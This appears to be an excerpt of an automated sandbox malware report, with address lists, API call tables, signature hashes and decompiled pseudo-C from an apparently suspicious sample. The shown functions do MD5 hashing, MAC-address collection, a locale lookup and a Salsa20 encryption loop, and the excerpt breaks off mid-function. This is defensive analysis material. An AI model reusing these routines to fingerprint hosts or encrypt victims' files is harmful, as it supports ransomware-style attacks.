                                                                                    0x0040fdd2
                                                                                    0x0040fddb
                                                                                    0x0040fddd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fdea
                                                                                    0x0040fec2
                                                                                    0x0040fec3
                                                                                    0x0040fecc
                                                                                    0x0040fece
                                                                                    0x0040fed5
                                                                                    0x0040fed5
                                                                                    0x0040fede
                                                                                    0x00000000
                                                                                    0x0040fee4
                                                                                    0x0040fee6
                                                                                    0x0040feed
                                                                                    0x0040fef0
                                                                                    0x0040fefa
                                                                                    0x0040ff02
                                                                                    0x0040ff07
                                                                                    0x0040ff13
                                                                                    0x0040ff19
                                                                                    0x0040ff1f
                                                                                    0x0040ff1f
                                                                                    0x0040ff22
                                                                                    0x0040ff22
                                                                                    0x0040ff25
                                                                                    0x0040ff28
                                                                                    0x0040ff2f
                                                                                    0x0040ff31
                                                                                    0x0040ff31
                                                                                    0x0040ff39
                                                                                    0x0040ff3c
                                                                                    0x0040ff48
                                                                                    0x0040ff53
                                                                                    0x0040ff55
                                                                                    0x0040ff59
                                                                                    0x0040ff5c
                                                                                    0x0040ff62
                                                                                    0x0040ff6a
                                                                                    0x0040ff9a
                                                                                    0x0040ff9a
                                                                                    0x0040ffa0
                                                                                    0x0040ffa8
                                                                                    0x0040ffda
                                                                                    0x0040ffde
                                                                                    0x0040ffe0
                                                                                    0x0040ffe9
                                                                                    0x0040ffeb
                                                                                    0x0040ffeb
                                                                                    0x0040ffed
                                                                                    0x0040ffee
                                                                                    0x0040ffef
                                                                                    0x0040fff4
                                                                                    0x0040fff9
                                                                                    0x0040fffb
                                                                                    0x00410005
                                                                                    0x0041000b
                                                                                    0x0041000d
                                                                                    0x0041000d
                                                                                    0x00410016
                                                                                    0x00410017
                                                                                    0x0041001b
                                                                                    0x0041001c
                                                                                    0x00410021
                                                                                    0x00410026
                                                                                    0x00410031
                                                                                    0x00410035
                                                                                    0x00410035
                                                                                    0x00410026
                                                                                    0x0040fff9
                                                                                    0x0041003a
                                                                                    0x0041003a
                                                                                    0x00410042
                                                                                    0x00410047
                                                                                    0x0041004c
                                                                                    0x0041004c
                                                                                    0x0041004f
                                                                                    0x00000000
                                                                                    0x0041004f
                                                                                    0x00000000
                                                                                    0x0040ffb0
                                                                                    0x0040ffb4
                                                                                    0x0040ffba
                                                                                    0x0040ffb6
                                                                                    0x0040ffb6
                                                                                    0x0040ffb6
                                                                                    0x0040ffbc
                                                                                    0x0040ffc2
                                                                                    0x0040ffc3
                                                                                    0x0040ffc4
                                                                                    0x0040ffc9
                                                                                    0x0040ffce
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040ffd0
                                                                                    0x0040ffd5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040ffd7
                                                                                    0x00000000
                                                                                    0x0040ffd7
                                                                                    0x00000000
                                                                                    0x0040ff70
                                                                                    0x0040ff74
                                                                                    0x0040ff7a
                                                                                    0x0040ff76
                                                                                    0x0040ff76
                                                                                    0x0040ff76
                                                                                    0x0040ff7c
                                                                                    0x0040ff7d
                                                                                    0x0040ff7e
                                                                                    0x0040ff83
                                                                                    0x0040ff88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040ff8a
                                                                                    0x0040ff8f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040ff97
                                                                                    0x0040ff97
                                                                                    0x00000000
                                                                                    0x0040ff93
                                                                                    0x0040ff93
                                                                                    0x00000000
                                                                                    0x0040ff93
                                                                                    0x0040ff15
                                                                                    0x00000000
                                                                                    0x0040ff15
                                                                                    0x0040fede
                                                                                    0x0040fe00
                                                                                    0x0040fe05
                                                                                    0x0040fe08
                                                                                    0x0040fe15
                                                                                    0x0040fe19
                                                                                    0x0040fe20
                                                                                    0x0040fe2a
                                                                                    0x0040fe34
                                                                                    0x0040fe3b
                                                                                    0x0040fe44
                                                                                    0x0040fe4f
                                                                                    0x0040fe5e
                                                                                    0x0040fe65
                                                                                    0x0040fe71
                                                                                    0x0040fe79
                                                                                    0x0040fe7e
                                                                                    0x0040fe7e
                                                                                    0x0040fe83
                                                                                    0x0040fe8e
                                                                                    0x0040fe98
                                                                                    0x0040fea2
                                                                                    0x0040fea9
                                                                                    0x0040feb5
                                                                                    0x0040feba
                                                                                    0x0040feba
                                                                                    0x00000000
                                                                                    0x0040fea9
                                                                                    0x0040fdbd
                                                                                    0x0040fdc1
                                                                                    0x0040fdc5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fdc7
                                                                                    0x0040fdca
                                                                                    0x0040fdd0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fdd0
                                                                                    0x0040fdd6
                                                                                    0x0040fdd8
                                                                                    0x00000000
                                                                                    0x0040fdd8
                                                                                    0x0040fd7d
                                                                                    0x0040fd81
                                                                                    0x0040fd85
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fd87
                                                                                    0x0040fd8a
                                                                                    0x0040fd90
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040fd90
                                                                                    0x0040fd96
                                                                                    0x0040fd98
                                                                                    0x00000000
                                                                                    0x00410052
                                                                                    0x0041005a
                                                                                    0x00410060
                                                                                    0x00410063
                                                                                    0x0041006c
                                                                                    0x00000000
                                                                                    0x0041006c
                                                                                    0x0040fd4c
                                                                                    0x0040fb31
                                                                                    0x0040fb36
                                                                                    0x0040fb38
                                                                                    0x0040fb3a
                                                                                    0x0040fb41
                                                                                    0x0040fb49
                                                                                    0x0040fb50
                                                                                    0x0040fb55

                                                                                    APIs
                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                    • _memmove.LIBCMT ref: 0040F9EA
                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                    • _memmove.LIBCMT ref: 0040FADA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                    • String ID:
                                                                                    • API String ID: 273148273-0
                                                                                    • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                    • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                    • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                    • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 47%
                                                                                    			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                    				int _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				int _v24;
                                                                                    				int _v28;
                                                                                    				long* _v32;
                                                                                    				int _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				char _v48;
                                                                                    				char _v52;
                                                                                    				char _v56;
                                                                                    				char _v72;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				long** _t42;
                                                                                    				int* _t43;
                                                                                    				char _t45;
                                                                                    				char _t51;
                                                                                    				intOrPtr _t58;
                                                                                    				void* _t72;
                                                                                    				intOrPtr* _t80;
                                                                                    				void* _t86;
                                                                                    				void* _t87;
                                                                                    				void* _t88;
                                                                                    				int _t89;
                                                                                    				void* _t91;
                                                                                    				void* _t92;
                                                                                    				intOrPtr* _t93;
                                                                                    				void* _t94;
                                                                                    				intOrPtr _t96;
                                                                                    				intOrPtr _t97;
                                                                                    				void* _t99;
                                                                                    
                                                                                    				 *[fs:0x0] = _t96;
                                                                                    				_t97 = _t96 - 0x38;
                                                                                    				_t73 = _a4;
                                                                                    				_v20 = _t97;
                                                                                    				_t88 = __ecx;
                                                                                    				_v32 = 0;
                                                                                    				_t92 = __edx;
                                                                                    				_v24 = 0;
                                                                                    				_v36 = 0;
                                                                                    				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
                                                                                    				_t42 =  &_v32;
                                                                                    				_v8 = 0;
                                                                                    				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
                                                                                    				if(_t42 == 0) {
                                                                                    					_v40 = _t42;
                                                                                    					E00430ECA( &_v40, 0x5085b8);
                                                                                    				}
                                                                                    				_t43 =  &_v24;
                                                                                    				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
                                                                                    				if(_t43 == 0) {
                                                                                    					_v44 = _t43;
                                                                                    					_t43 = E00430ECA( &_v44, 0x5085b8);
                                                                                    				}
                                                                                    				__imp__CryptHashData(_v24, _t88, _t92, 0);
                                                                                    				if(_t43 == 0) {
                                                                                    					_v48 = _t43;
                                                                                    					E00430ECA( &_v48, 0x5085b8);
                                                                                    				}
                                                                                    				_t93 = __imp__CryptGetHashParam;
                                                                                    				_v28 = 0;
                                                                                    				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
                                                                                    				_t105 = _t45;
                                                                                    				if(_t45 == 0) {
                                                                                    					_v52 = _t45;
                                                                                    					E00430ECA( &_v52, 0x5085b8);
                                                                                    				}
                                                                                    				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
                                                                                    				_v36 = _t89;
                                                                                    				E0042B420(_t89, 0, _v28 + 1);
                                                                                    				_t99 = _t97 + 0x10;
                                                                                    				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
                                                                                    				if(_t51 == 0) {
                                                                                    					_v56 = _t51;
                                                                                    					E00430ECA( &_v56, 0x5085b8);
                                                                                    				}
                                                                                    				_t94 = 0;
                                                                                    				while(_t94 < _v28) {
                                                                                    					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
                                                                                    					_t99 = _t99 + 0xc;
                                                                                    					if(_v72 != 0) {
                                                                                    						_t80 =  &_v72;
                                                                                    						_t35 = _t80 + 1; // 0x1
                                                                                    						_t86 = _t35;
                                                                                    						do {
                                                                                    							_t58 =  *_t80;
                                                                                    							_t80 = _t80 + 1;
                                                                                    							__eflags = _t58;
                                                                                    						} while (_t58 != 0);
                                                                                    						_push(_t80 - _t86);
                                                                                    						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
                                                                                    						_t94 = _t94 + 1;
                                                                                    					} else {
                                                                                    						_push(0);
                                                                                    						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
                                                                                    						_t94 = _t94 + 1;
                                                                                    					}
                                                                                    					L18:
                                                                                    				}
                                                                                    				E00422110(_t89);
                                                                                    				__imp__CryptDestroyHash(_v24);
                                                                                    				CryptReleaseContext(_v32, 0);
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return 1;
                                                                                    				goto L18;
                                                                                    			}





































                                                                                    0x0040ec13
                                                                                    0x0040ec16
                                                                                    0x0040ec16
                                                                                    0x0040ec20
                                                                                    0x0040ec20
                                                                                    0x0040ec22
                                                                                    0x0040ec23
                                                                                    0x0040ec23
                                                                                    0x0040ec2c
                                                                                    0x0040ec30
                                                                                    0x0040ec35
                                                                                    0x0040ec02
                                                                                    0x0040ec07
                                                                                    0x0040ec0b
                                                                                    0x0040ec10
                                                                                    0x0040ec10
                                                                                    0x00000000
                                                                                    0x0040ec00
                                                                                    0x0040ec39
                                                                                    0x0040ec44
                                                                                    0x0040ec4f
                                                                                    0x0040ec5a
                                                                                    0x0040ec67
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                    • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                    • _memset.LIBCMT ref: 0040EBB4
                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                    • _sprintf.LIBCMT ref: 0040EBF4
                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                    • String ID: %.2X
                                                                                    • API String ID: 1637485200-213608013
                                                                                    • Opcode ID: a599e18bc04695a82c26e85c85861b91a013a0871735adccb8c8778c42f29281
                                                                                    • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                    • Opcode Fuzzy Hash: a599e18bc04695a82c26e85c85861b91a013a0871735adccb8c8778c42f29281
                                                                                    • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
                                                                                    				char _v8;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				char* _t14;
                                                                                    				char* _t15;
                                                                                    				void* _t35;
                                                                                    				void* _t36;
                                                                                    				void* _t37;
                                                                                    				char* _t41;
                                                                                    				void* _t44;
                                                                                    				void* _t45;
                                                                                    
                                                                                    				_t33 = __ebx;
                                                                                    				_push(_t36);
                                                                                    				_v8 = 0x288;
                                                                                    				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
                                                                                    				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
                                                                                    				_t45 = _t44 + 8;
                                                                                    				_t49 = _t41;
                                                                                    				if(_t41 != 0) {
                                                                                    					_t14 =  &_v8;
                                                                                    					__imp__GetAdaptersInfo(_t41, _t14);
                                                                                    					__eflags = _t14 - 0x6f;
                                                                                    					if(_t14 != 0x6f) {
                                                                                    						L4:
                                                                                    						_t15 =  &_v8;
                                                                                    						__imp__GetAdaptersInfo(_t41, _t15);
                                                                                    						__eflags = _t15;
                                                                                    						if(_t15 == 0) {
                                                                                    							_push( *(_t41 + 0x199) & 0x000000ff);
                                                                                    							_push( *(_t41 + 0x198) & 0x000000ff);
                                                                                    							_push( *(_t41 + 0x197) & 0x000000ff);
                                                                                    							_push( *(_t41 + 0x196) & 0x000000ff);
                                                                                    							_push( *(_t41 + 0x195) & 0x000000ff);
                                                                                    							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
                                                                                    							_push(_t37);
                                                                                    							_t11 = _t41 + 0x1b0; // 0x1b0
                                                                                    							_push("Address: %s, mac: %s\n");
                                                                                    							E00421F2D(_t33, _t37, _t41, __eflags);
                                                                                    							_push("\n");
                                                                                    							E00421F2D(_t33, _t37, _t41, __eflags);
                                                                                    							_t45 = _t45 + 0x30;
                                                                                    						}
                                                                                    						E00420BED(_t41);
                                                                                    						return _t37;
                                                                                    					} else {
                                                                                    						E00420BED(_t41);
                                                                                    						_t41 = E00420C62(_t33, _t35, _t37, _v8);
                                                                                    						_t45 = _t45 + 8;
                                                                                    						__eflags = _t41;
                                                                                    						if(__eflags == 0) {
                                                                                    							goto L1;
                                                                                    						} else {
                                                                                    							goto L4;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					L1:
                                                                                    					_push("Error allocating memory needed to call GetAdaptersinfo\n");
                                                                                    					E00421F2D(_t33, _t37, _t41, _t49);
                                                                                    					E00420BED(_t37);
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}
















                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 0040E67F
                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                    • _malloc.LIBCMT ref: 0040E68B
                                                                                    • _wprintf.LIBCMT ref: 0040E69E
                                                                                    • _free.LIBCMT ref: 0040E6A4
                                                                                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                    • _free.LIBCMT ref: 0040E6C5
                                                                                    • _malloc.LIBCMT ref: 0040E6CD
                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                    • _sprintf.LIBCMT ref: 0040E720
                                                                                    • _wprintf.LIBCMT ref: 0040E732
                                                                                    • _wprintf.LIBCMT ref: 0040E73C
                                                                                    • _free.LIBCMT ref: 0040E745
                                                                                    Strings
                                                                                    • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                    • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                    • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                    • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                    • API String ID: 3901070236-1604013687
                                                                                    • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                    • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                    • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                    • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004382A2(short _a4, intOrPtr _a8) {
                                                                                    				short _t13;
                                                                                    				short _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
                                                                                    					if(E00437413(_t28, ?str?) != 0) {
                                                                                    						return E00423C92(_t28);
                                                                                    					}
                                                                                    					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                                                    						L9:
                                                                                    						return 0;
                                                                                    					}
                                                                                    					return _a4;
                                                                                    				}
                                                                                    				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                                                    					goto L9;
                                                                                    				}
                                                                                    				_t13 = _a4;
                                                                                    				if(_t13 == 0) {
                                                                                    					return GetACP();
                                                                                    				}
                                                                                    				return _t13;
                                                                                    			}






                                                                                    APIs
                                                                                    • _wcscmp.LIBCMT ref: 004382B9
                                                                                    • _wcscmp.LIBCMT ref: 004382CA
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale_wcscmp
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 1351282208-711371036
                                                                                    • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                    • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                    • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                    • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				signed int _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				char _v60;
                                                                                    				signed int _v64;
                                                                                    				signed int _v68;
                                                                                    				signed int _v72;
                                                                                    				signed int _v76;
                                                                                    				signed int _v80;
                                                                                    				signed int _v84;
                                                                                    				signed int _v88;
                                                                                    				signed int _v92;
                                                                                    				signed int _v96;
                                                                                    				signed int _v100;
                                                                                    				signed int _v104;
                                                                                    				signed int _v108;
                                                                                    				signed int _v112;
                                                                                    				signed int _v116;
                                                                                    				signed int _v120;
                                                                                    				signed int _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				char _v190;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				intOrPtr _t174;
                                                                                    				signed int _t186;
                                                                                    				signed int _t217;
                                                                                    				signed int _t219;
                                                                                    				signed int _t225;
                                                                                    				signed int _t229;
                                                                                    				signed int _t235;
                                                                                    				signed int _t237;
                                                                                    				void* _t244;
                                                                                    				intOrPtr _t248;
                                                                                    				signed char _t250;
                                                                                    				signed int _t252;
                                                                                    				signed int _t254;
                                                                                    				signed int _t255;
                                                                                    				signed int _t256;
                                                                                    				signed int _t258;
                                                                                    				signed int _t260;
                                                                                    				signed int _t262;
                                                                                    				signed int _t264;
                                                                                    				signed int _t266;
                                                                                    				signed int _t268;
                                                                                    				signed int _t269;
                                                                                    				signed int _t270;
                                                                                    				signed int* _t272;
                                                                                    				signed int _t276;
                                                                                    				signed int _t277;
                                                                                    				intOrPtr _t284;
                                                                                    				void* _t285;
                                                                                    				void* _t286;
                                                                                    				signed int _t288;
                                                                                    				signed int _t289;
                                                                                    				unsigned int _t290;
                                                                                    				intOrPtr _t292;
                                                                                    				signed char* _t293;
                                                                                    				signed int _t294;
                                                                                    				signed int _t295;
                                                                                    				signed char* _t296;
                                                                                    				void* _t297;
                                                                                    				signed int _t298;
                                                                                    				signed int _t299;
                                                                                    				char* _t301;
                                                                                    				void* _t303;
                                                                                    				void* _t305;
                                                                                    				void* _t313;
                                                                                    
                                                                                    				_t297 = __esi;
                                                                                    				_t286 = __edx;
                                                                                    				_t251 = _a4;
                                                                                    				_t174 = __ecx;
                                                                                    				_v56 = __ecx;
                                                                                    				_t293 = _a8;
                                                                                    				if(_a4 == 0) {
                                                                                    					L2:
                                                                                    					_push(0x7a);
                                                                                    					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
                                                                                    					_t174 = _v56;
                                                                                    				} else {
                                                                                    					_t309 = _t293;
                                                                                    					if(_t293 == 0) {
                                                                                    						goto L2;
                                                                                    					}
                                                                                    				}
                                                                                    				if(_a12 != 0) {
                                                                                    					_v128 = _t174 -  &_v190;
                                                                                    					_push(_t297);
                                                                                    					do {
                                                                                    						asm("movdqu xmm0, [eax]");
                                                                                    						_v60 = 0xa;
                                                                                    						asm("movdqu [ebp-0x78], xmm0");
                                                                                    						asm("movdqu xmm0, [eax+0x10]");
                                                                                    						asm("movdqu [ebp-0x68], xmm0");
                                                                                    						asm("movdqu xmm0, [eax+0x20]");
                                                                                    						asm("movdqu [ebp-0x58], xmm0");
                                                                                    						_t294 = _v80;
                                                                                    						asm("movdqu xmm0, [eax+0x30]");
                                                                                    						_v8 = _v84;
                                                                                    						_v36 = _v88;
                                                                                    						_v16 = _v92;
                                                                                    						_v48 = _v96;
                                                                                    						_v44 = _v100;
                                                                                    						_v32 = _v104;
                                                                                    						_v12 = _v108;
                                                                                    						_v40 = _v112;
                                                                                    						asm("movdqu [ebp-0x48], xmm0");
                                                                                    						_t252 = _v76;
                                                                                    						_t276 = _v64;
                                                                                    						_t288 = _v68;
                                                                                    						_t298 = _v72;
                                                                                    						_v28 = _v116;
                                                                                    						_v24 = _v120;
                                                                                    						_t186 = _v124;
                                                                                    						_v52 = _t252;
                                                                                    						_v20 = _t186;
                                                                                    						do {
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_v12 = _v12 ^ _t186 + _t252;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_v16 = _v16 ^ _v12 + _v20;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t254 = _v52 ^ _v16 + _v12;
                                                                                    							_v52 = _t254;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v20 = _v20 ^ _v16 + _t254;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_v36 = _v36 ^ _v24 + _v32;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_t299 = _t298 ^ _v36 + _v32;
                                                                                    							_t255 = _v44;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_v24 = _v24 ^ _v36 + _t299;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v32 = _v32 ^ _v24 + _t299;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_t289 = _t288 ^ _v8 + _t255;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_v28 = _v28 ^ _v8 + _t289;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t256 = _t255 ^ _v28 + _t289;
                                                                                    							_v44 = _t256;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_v8 = _v8 ^ _v28 + _t256;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_t258 = _v40 ^ _t294 + _t276;
                                                                                    							_v40 = _t258;
                                                                                    							asm("rol eax, 0x9");
                                                                                    							_t260 = _v48 ^ _t258 + _t276;
                                                                                    							_v48 = _t260;
                                                                                    							asm("rol eax, 0xd");
                                                                                    							_t295 = _t294 ^ _v40 + _t260;
                                                                                    							asm("ror eax, 0xe");
                                                                                    							_t277 = _t276 ^ _t260 + _t295;
                                                                                    							asm("rol eax, 0x7");
                                                                                    							_v24 = _v24 ^ _v20 + _v40;
                                                                                    							_t217 = _v24;
                                                                                    							_v120 = _t217;
